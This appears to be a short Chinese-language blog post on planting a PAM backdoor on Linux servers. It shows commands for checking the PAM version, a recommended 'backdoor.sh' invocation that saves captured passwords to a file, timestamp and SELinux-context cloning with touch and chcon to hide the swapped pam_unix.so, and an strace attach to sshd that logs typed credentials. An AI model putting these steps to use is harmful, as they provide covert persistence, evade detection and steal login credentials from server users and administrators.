请注意，本文编写于 1281 天前，最后修改于 1281 天前，其中某些信息可能已经过时。

直接开始

原理很多咱也不多说了，主要聊聊版本查询的问题。
中文搜索直接搜索关于pam版本信息的，大部分都是关于pam后门，内容几乎千篇一律，少部分是讲解PAM作用的。

rpm -qa |grep pam

然后debian系的下运行这个命令很大概率回会啥也不返回。这时候我们就应该用

dpkg -l | grep pam

这样子就行了

推荐一个脚本

脚本使用方法就是

./backdoor.sh -m save -v 1.3.0 -o /tmp/log.txt

其中o为密码保存路径

之后就是克隆时间了

touch pam_unix.so -r pam_unix.so.src
ls -Z pam_unix.so.src
chcon –reference=pam_unix.so.src pam_unix.so

如果只是为了记录密码

昨晚还从九世那学来一种新的

pid=ps -elf | grep "sshd -D" | grep -v grep | awk '{print $4}'
screen strace -f -p $pid -o /tmp/test.log -e trace=read,write -s 2048 &